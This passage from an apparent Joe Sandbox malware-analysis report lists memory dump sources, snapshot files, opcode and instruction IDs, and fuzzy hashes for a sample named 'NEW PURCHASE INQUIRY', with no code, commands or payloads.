                                        • Opcode Fuzzy Hash: abc98bd15dc2efac4a306b7acc6a499eb46e7920f19da8f2369e82a6b5e97e41
                                        • Instruction Fuzzy Hash: 5D2145317052109FC3618B69E84096ABBEEEFC1311B2980BAE50EC7961DB31EC42C390
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203284695.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6930000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 990b85be1195e18e9fe7c77a1dd592faf5cbbff1466d7df8e5b59bd96e7ddfb9
                                        • Instruction ID: 7393ab8e54217f6203dbf954f63e98dfae4297bf9ded8a4f312bb4c15eaa83c0
                                        • Opcode Fuzzy Hash: 990b85be1195e18e9fe7c77a1dd592faf5cbbff1466d7df8e5b59bd96e7ddfb9
                                        • Instruction Fuzzy Hash: A1319930A057558FCB41EF68C8508AEBBF5FF8A700B10459BE555DB361DB34590ACBA2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203856165.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6a70000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fc9a71a88a64a7d8f0fe50c2387eb4986c8d1443b6aa341c7292009b03e3e638
                                        • Instruction ID: 3a63428b1e01836b3e192f4e711fe64b3cd116b3c0e92884352f1933a8e5ba41
                                        • Opcode Fuzzy Hash: fc9a71a88a64a7d8f0fe50c2387eb4986c8d1443b6aa341c7292009b03e3e638
                                        • Instruction Fuzzy Hash: 23313170E092198FDB44EFAAD944BEEBBF2BF88300F108029E518B7250D7749A44CF90
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203856165.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6a70000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 680bd6a1583fe2f8176034cd44633c4254c5f068eb2207330c1531a619536151
                                        • Instruction ID: c917713702a1907f2f537ae3817658bd2b79336615bb16561da6d299950d78ad
                                        • Opcode Fuzzy Hash: 680bd6a1583fe2f8176034cd44633c4254c5f068eb2207330c1531a619536151
                                        • Instruction Fuzzy Hash: D341F570D04219CFDBA4EF29CC88BAAB7F2BB49304F1190A9D04DE7296DB395985CF45
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2180610051.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1220000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7b0898b6b5445bb140adb8b6b237d5fd46655837fb8bb170bc7b8743817fdcaa
                                        • Instruction ID: 9cb7ce7e1ddea36404122989e80f153d5b5cae4a6ca497289bb84244dc24eb4f
                                        • Opcode Fuzzy Hash: 7b0898b6b5445bb140adb8b6b237d5fd46655837fb8bb170bc7b8743817fdcaa
                                        • Instruction Fuzzy Hash: 2A3148B0D00259AFDB24CFAAC584AEEBFF5EF48300F248019E909AB254DB349945CB90
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203856165.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6a70000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 604bda0ad06a5120ce76c10340878d343c69a440b609637a20b0af0dfc3edc54
                                        • Instruction ID: 45540c0dbc47548eeccf6ade44c62671925a55acad8c0b7cb75ff7a90098ba7e
                                        • Opcode Fuzzy Hash: 604bda0ad06a5120ce76c10340878d343c69a440b609637a20b0af0dfc3edc54
                                        • Instruction Fuzzy Hash: BB313370E002088FDB44EFAADC48AEEBBF2BF89301F04806AD425B7255D7785944CBA1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203856165.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6a70000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 942ba1cf58c8911b4545f8ef420b19a82379f5ee25da420983ca704a070e92db
                                        • Instruction ID: a1d23d968f7a5009d3e8fefb3ff7e228d8b1498366ad83622a34614b9c1030cc
                                        • Opcode Fuzzy Hash: 942ba1cf58c8911b4545f8ef420b19a82379f5ee25da420983ca704a070e92db
                                        • Instruction Fuzzy Hash: 3F317C30600301CFC769AF75D854A6ABBB7FF85305B10886DE9468B365DB35ED4ACB50
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203856165.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6a70000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dc2f27568b9ef18be323282120cac5066230c491f2bf199004e62bbce4a3c7e0
                                        • Instruction ID: 1042250eaf687bd75eb233a3c3bb7d1c44ebe4e13d37be6060c889d2135cb0b8
                                        • Opcode Fuzzy Hash: dc2f27568b9ef18be323282120cac5066230c491f2bf199004e62bbce4a3c7e0
                                        • Instruction Fuzzy Hash: 96310670E002198FDB44EFAADC48AEEBBF2BF88311F04916AD424B7254D7745955CFA1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203284695.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6930000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0627ac8650425103157c276e0a46ee6fe177783e6f39335ac885e4fc0473e032
                                        • Instruction ID: 0b329ee69785ded6865322e713b14880efe86cea2cb9ea72cfb115cee0bb9e63
                                        • Opcode Fuzzy Hash: 0627ac8650425103157c276e0a46ee6fe177783e6f39335ac885e4fc0473e032
                                        • Instruction Fuzzy Hash: 5C31F070E042698FDB44CFAAD484AEEBBFAFB88314F10802AE519E7641D7345E44CB91
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203856165.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6a70000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5420c9024c0f09f05a2037573e4e994275b89cd67d83a52f30e773c6c6803291
                                        • Instruction ID: aa9e111b96bd24b2af0842b0ce3ea1a9c18ecd1b70c222b83cbaed9788e0a2b4
                                        • Opcode Fuzzy Hash: 5420c9024c0f09f05a2037573e4e994275b89cd67d83a52f30e773c6c6803291
                                        • Instruction Fuzzy Hash: 0B31F431D092899FCB42EFB4C8006EEBFF5EF4A301F1445AAD455EB291D7358A48CBA1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203856165.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6a70000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0c4fab5a7fba9ebdce46abe33cf4d4a64eb048444f75ef9918736a2c9f12e2d9
                                        • Instruction ID: 4a7599fb68df5f5c104e7a823689f046d1b8508d04343bf88eacb70beab2faf7
                                        • Opcode Fuzzy Hash: 0c4fab5a7fba9ebdce46abe33cf4d4a64eb048444f75ef9918736a2c9f12e2d9
                                        • Instruction Fuzzy Hash: 63312B35B01209EFDB44DFA8D994AAEBBB5FF89720F10406AE515EB360DB319901CB90
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203856165.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6a70000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ba00a1056510048b978f82001bfdd7dbbe0417cdab6ea3ad4ede51e627e814d8
                                        • Instruction ID: fa20b629e4c1ab938e879b8d0daab01f79aeb3053eed9e35c016d91b7703cb93
                                        • Opcode Fuzzy Hash: ba00a1056510048b978f82001bfdd7dbbe0417cdab6ea3ad4ede51e627e814d8
                                        • Instruction Fuzzy Hash: B731AB70E04259CFEB00DFA5D854AEEBBF6EB89301F10806AD415AB395C7385E06CF92
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203344371.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6940000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7316f6931971843609822d78c6ce6d0fc3dd5571162cf30d2aaaf60b424c0552
                                        • Instruction ID: f3ab0445d3fe4a046774c5bd6662705d7bc1760ef6f20c1f2fb8a91d6db1c421
                                        • Opcode Fuzzy Hash: 7316f6931971843609822d78c6ce6d0fc3dd5571162cf30d2aaaf60b424c0552
                                        • Instruction Fuzzy Hash: 5031C038A08218CFEB50DFA8C988FAEBBF2FB49304F108199E509A7655C7349955DF51
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2180610051.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1220000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a9ad097fb64cf57abb0df5acc5652be28d3786601c8c16a1893dbf2ff351f2e2
                                        • Instruction ID: 8df67c397e127703fe0ce8da88d979eb337d97ddfa257cd170c79bdc9e17b262
                                        • Opcode Fuzzy Hash: a9ad097fb64cf57abb0df5acc5652be28d3786601c8c16a1893dbf2ff351f2e2
                                        • Instruction Fuzzy Hash: 6F3128B0D00259AFDB14CFAAC580AEEBFF5EF48300F248019E919AB354DB359945CB90
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203284695.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6930000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 80510d94da40365be14d5619fe0f3588177a33edc9e21160252d889db1f5e3bb
                                        • Instruction ID: 480a36e3770bec1acd8eedfbaffbae47e241f7819cad47fea8645fad90797d50
                                        • Opcode Fuzzy Hash: 80510d94da40365be14d5619fe0f3588177a33edc9e21160252d889db1f5e3bb
                                        • Instruction Fuzzy Hash: B7317874D05228EFC790DFA9D8806ADBBF1FB49301F1085EAD418A7265D7314E44CB80
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203856165.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6a70000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 57df9f617756605f254bb05584970345424c0e54156e3d5ae20ad50ebea1b770
                                        • Instruction ID: 1d582c3c05d473458b6887df683db459fb78c71a0b7a4c181b159ae76000931a
                                        • Opcode Fuzzy Hash: 57df9f617756605f254bb05584970345424c0e54156e3d5ae20ad50ebea1b770
                                        • Instruction Fuzzy Hash: 9B21253120A3918FC7129F78EC609A67BB4EF87320B0541EBF845DB262D6389D55C7A1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2180610051.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1220000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 05ec2d73b93c6584880366a4b47d2c72b2f745ce9649046403348e7d4d7dbdbd
                                        • Instruction ID: 07759505b9fc1801c87348c282d94a5dd005b7c980f8516972a7e78744f46b6d
                                        • Opcode Fuzzy Hash: 05ec2d73b93c6584880366a4b47d2c72b2f745ce9649046403348e7d4d7dbdbd
                                        • Instruction Fuzzy Hash: 36319C70910249EFDB04DFAAC4897AEBBF4FB8A301F14C1A9E019B7251D77A0A55CF42
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203284695.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6930000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d082dbf3ca2db99f43bbdc5c80dc6c68f2c3ec6cdf66527682473544b0311fc5
                                        • Instruction ID: 042e6fbd7818e4c20067eb630e5fdc9681f043293f66a1aa92ea3bb76b02d24d
                                        • Opcode Fuzzy Hash: d082dbf3ca2db99f43bbdc5c80dc6c68f2c3ec6cdf66527682473544b0311fc5
                                        • Instruction Fuzzy Hash: DF213E36750154EFDB11CF68EC44DA6BFAAEFC9224B084195F9598B632C731CC11D790
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2180610051.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1220000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0221ba8441ee0e1b3071b88203e184ba3db2e21492faa4fdbdef32b7db70a95a
                                        • Instruction ID: 337d3d7ab2d495bda1b5c4ab8c6e3e5eac1fc52c0e96de33e8751b1267a568b1
                                        • Opcode Fuzzy Hash: 0221ba8441ee0e1b3071b88203e184ba3db2e21492faa4fdbdef32b7db70a95a
                                        • Instruction Fuzzy Hash: 17318970810258EFDB04DFAAC4897AEBBF4FB8A301F10C1A9E00AA3251D7760A55CF02
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203284695.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6930000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c74988a83b2c6df8c0ba3db979ba87d5b81465d258cc0988578a72d76c05cb4e
                                        • Instruction ID: a70f560e4a0354489815844c85bd458a97a12e41aebefee84cd08965925063ee
                                        • Opcode Fuzzy Hash: c74988a83b2c6df8c0ba3db979ba87d5b81465d258cc0988578a72d76c05cb4e
                                        • Instruction Fuzzy Hash: 5521A634B10A19CFCB84EF68C8548AEB7B5FFC9700F10412AD51697324EF74AA46CBA1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203856165.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6a70000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7dbce620f681dbf5414eb4375e948a0c9aac51801f980197836bd53c1eb27cd9
                                        • Instruction ID: 94096d15604c0c3feb0e23710ce5001162d31e9a053bbc9be4e5fa01878d1305
                                        • Opcode Fuzzy Hash: 7dbce620f681dbf5414eb4375e948a0c9aac51801f980197836bd53c1eb27cd9
                                        • Instruction Fuzzy Hash: 4B217C75A00219AFDB059F68C8549EEBBB7EF8C321F148129E911AB394DB359841CBA0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203344371.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6940000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4fb63e42f645a52379feb0a26a0a01ca2f5aad23ac7dc13f50759a6cc6d2a0c3
                                        • Instruction ID: 153272feb6c23ce9a6d63bee3519800bacc9c0acba90f4870dfa53dde4169249
                                        • Opcode Fuzzy Hash: 4fb63e42f645a52379feb0a26a0a01ca2f5aad23ac7dc13f50759a6cc6d2a0c3
                                        • Instruction Fuzzy Hash: A431CF34A08218CFEB50DFA8C988FAEBBF2FB09304F108199E919A7745C7749941DF95
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203284695.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6930000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6dd9a0b743ff71f7efc50e65d12eefcf23c0e37496e7425dd61572150660a09a
                                        • Instruction ID: cfb4a5191b6cf03705122be5a5634e457271aaa0554d840446d8223508cc783d
                                        • Opcode Fuzzy Hash: 6dd9a0b743ff71f7efc50e65d12eefcf23c0e37496e7425dd61572150660a09a
                                        • Instruction Fuzzy Hash: E9213935A00219EFCB05DF68D844C99BBB2FF89314B0581AAE6159B231C731E916DF50
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203856165.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6a70000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e5134c40ba82d0bfb2e20f3875775adc9f73e4ece718cb99687f3b2f7128aebe
                                        • Instruction ID: 543a806056b02c10c65cd5bd6c6abeb33032aacddad2c5d5afe95cbf916cddb4
                                        • Opcode Fuzzy Hash: e5134c40ba82d0bfb2e20f3875775adc9f73e4ece718cb99687f3b2f7128aebe
                                        • Instruction Fuzzy Hash: 9C318B70E04109CFEB40EF99D844AEEBBF6FB89305F10806AD515A7344C7385A46CF91
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203856165.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6a70000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9daa53a3b91b770c1ecce05f5d5c9541038ea10cca5e7e773bbe57234698eb8f
                                        • Instruction ID: 85f1910f8d7d7efe37790871bc160273ea914cd61e5ebefccd730c026a42b961
                                        • Opcode Fuzzy Hash: 9daa53a3b91b770c1ecce05f5d5c9541038ea10cca5e7e773bbe57234698eb8f
                                        • Instruction Fuzzy Hash: B2213671E0020AAFEB90EFB8C904BAEBBB5AB54250F108066D559DB294E634CA41CB91
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2180142219.0000000000EED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EED000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_eed000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c9d5c3e5c7bd15c4be08ad8daa87530edf9d93f48fe88f22c490698919329102
                                        • Instruction ID: 42187cf6736193829990ce130db0a92465b98468d89b284bc083bdc9d694c4ce
                                        • Opcode Fuzzy Hash: c9d5c3e5c7bd15c4be08ad8daa87530edf9d93f48fe88f22c490698919329102
                                        • Instruction Fuzzy Hash: FD214D7100D3C49FCB038F24D994716BF71AB46614F1985DBD8848B2A7C33A981ACBA2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2180142219.0000000000EED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EED000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_eed000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f28599dff8351c1b958395b84003787c862798cde0e63a4b7da334c17cefd33f
                                        • Instruction ID: 6ccfc3cf17b667456b821f0e9895b975930558a42eb044f4452738d8c18a0d17
                                        • Opcode Fuzzy Hash: f28599dff8351c1b958395b84003787c862798cde0e63a4b7da334c17cefd33f
                                        • Instruction Fuzzy Hash: F4210471508288DFCB15DF14DDC4B26BF66FB88314F28C569E9092B256C33AD816DBB2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203284695.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6930000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ad22d6d8b6dcfc55dc207f02bc1962ceee871492f178e27318032cbdd7824e6d
                                        • Instruction ID: 8b28abde09746bced75d94a33b9492c9b87d53f0d4bba724c34dd223c00a5156
                                        • Opcode Fuzzy Hash: ad22d6d8b6dcfc55dc207f02bc1962ceee871492f178e27318032cbdd7824e6d
                                        • Instruction Fuzzy Hash: 05210435700214AFCB64EB74D804AAF77A6EBC5321F104528E8558BB94CF35DC01C791
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203856165.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6a70000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9520b15cee3903212dddb761e88976ee1ffb079a0dec0e54d2a7aabfcf3d755b
                                        • Instruction ID: 6283f68a125cafff09de347471a326a12ac20ca35051e65d49e62a97066867e5
                                        • Opcode Fuzzy Hash: 9520b15cee3903212dddb761e88976ee1ffb079a0dec0e54d2a7aabfcf3d755b
                                        • Instruction Fuzzy Hash: 2721B0306002019FD758EB68E945BAE7BEAEFC4304F108539D10AD7685DF759D0A8BE1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203344371.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6940000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f01d9fe1a4a763a1d9a9bc543342e748083c828919163142bbd33dd2cbeda879
                                        • Instruction ID: a4ddf5f34bb473e04cb740f1dcbf1f7f7d3b226ce89c273ade0f8ac5ec51bdcc
                                        • Opcode Fuzzy Hash: f01d9fe1a4a763a1d9a9bc543342e748083c828919163142bbd33dd2cbeda879
                                        • Instruction Fuzzy Hash: 3C310234A08218CFEB50DFA8C888FAEBBB2FB09304F108199E919A7741C3749C44DF94
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203344371.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6940000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1a2a1762f059e1c4bdc55ae34d0a73005ea416d77f53d93eb4363c02346c189a
                                        • Instruction ID: 15b769ed4c7c341fe8832686c6ff46f64b51226b6a23420f4c9ceabefc859a13
                                        • Opcode Fuzzy Hash: 1a2a1762f059e1c4bdc55ae34d0a73005ea416d77f53d93eb4363c02346c189a
                                        • Instruction Fuzzy Hash: 3931C174A08218CFEB50DFA8C988FAEBBB2FB09304F108199E919A7741C7749D45DF95
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203344371.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6940000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 931b1d9b172ad0f257a772745f210355201622bd393cf3d52219574ea5474609
                                        • Instruction ID: c0f5443256856b914c9c0d4f046f3d222cb291cec3042aaef83b9170e7eaefea
                                        • Opcode Fuzzy Hash: 931b1d9b172ad0f257a772745f210355201622bd393cf3d52219574ea5474609
                                        • Instruction Fuzzy Hash: F431F834A08218CFEB50DFA8C588FAEBBB2FB09304F108599E519A7741C734AD44DF95
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203344371.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6940000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 28ad65d7707cba4b379f1a0a9e54e3db92c5395543ef196fd765ae030ba634b2
                                        • Instruction ID: de9d3f77e48af64eab5f184969f28673c05b74a5a741f78ce7d1f07406f58ae2
                                        • Opcode Fuzzy Hash: 28ad65d7707cba4b379f1a0a9e54e3db92c5395543ef196fd765ae030ba634b2
                                        • Instruction Fuzzy Hash: AC31D434A08218CFEB50DFA8D988FAEBBB2FB49304F108199E509A7745C7749D41DF95
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203344371.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6940000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ef42bba17b6727c39c2ee4681091d8674f6b32240e949bfaf8c2fd4c853a4951
                                        • Instruction ID: 43a03209924ddef3d8a9a8507bfc5cef8fdfd1921712df7ea2e1afdc3fe1b669
                                        • Opcode Fuzzy Hash: ef42bba17b6727c39c2ee4681091d8674f6b32240e949bfaf8c2fd4c853a4951
                                        • Instruction Fuzzy Hash: 8C31F434A08218CFEB50DFA8C988FAEBBB2FB09304F108199E919A7741C7749D40DF95
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203856165.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6a70000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0d4f7315bb0861e4266bd95b96b53871adfc5adad3a332b22030631c3bf6f5b3
                                        • Instruction ID: 80200ed4189af8597452c7d3d05b15f6b7cd893478484d3d17f50fc132220106
                                        • Opcode Fuzzy Hash: 0d4f7315bb0861e4266bd95b96b53871adfc5adad3a332b22030631c3bf6f5b3
                                        • Instruction Fuzzy Hash: A5310370A05248CFDB54EFA9D89479EBBF2FF8A304F149069D00AAB295CA356D81CB01
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203344371.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6940000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: aa78b1ac994662f1d69f944ecb59f53bfb156307454368245d1dddb4d36f2e66
                                        • Instruction ID: adba88a5e072450320d06c0bfb3cd590cf8ae848de0e95c0df4b84ccab341cff
                                        • Opcode Fuzzy Hash: aa78b1ac994662f1d69f944ecb59f53bfb156307454368245d1dddb4d36f2e66
                                        • Instruction Fuzzy Hash: 71313E74A00118CFCB94EFA8C995BAEB7B1FF44304F618069D516AB794CB315D95CF41
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203344371.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6940000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ebf2a67ee0ba88523714378c12f500cc226e8f7e29bc64c1db0edfaaae5ab779
                                        • Instruction ID: a1fc866d93169bac73f81459773896287e0d358c9cb8764c2a51306bf4aef230
